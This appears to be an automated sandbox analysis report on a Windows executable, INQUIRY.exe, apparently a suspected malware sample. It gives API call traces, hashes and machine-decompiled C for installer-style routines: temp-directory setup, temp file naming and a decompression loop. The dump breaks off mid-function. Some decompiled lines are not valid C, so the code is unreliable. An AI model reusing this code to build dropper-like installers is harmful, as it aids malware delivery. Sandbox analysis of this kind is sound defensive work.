Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402156
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x00402880
0x0040288c

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x0040578f
0x00405795
0x00405796
0x00405796
0x00405797
0x0040579e
0x004057a8
0x004057b5
0x004057b8
0x004057c0
0x00000000
0x00000000
0x004057c4
0x00000000
0x00000000
0x004057c6
0x00000000
0x004057c6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

"C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 00405792
nsa, xrefs: 00405797
C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\INQUIRY.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3200566217
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 021A07DD Relevance: 7.8, APIs: 5, Instructions: 307
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021A0AD8

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d3088c2b553b1c4b03664f18ea66a4f6c6281dc035037ce828c8aac50ed8e7d0
Instruction ID: 3db85271c05ef2f05ebaa9f87ae698ae7aecd1e67eb5093be8b6d6588eb38f34
Opcode Fuzzy Hash: d3088c2b553b1c4b03664f18ea66a4f6c6281dc035037ce828c8aac50ed8e7d0
Instruction Fuzzy Hash: 72B1F029E50358ADDB60DBE4ED21BBDB7B5AF48B10F20545BE518EE2E0E7710E80DB05

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

1033, xrefs: 00403219
C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
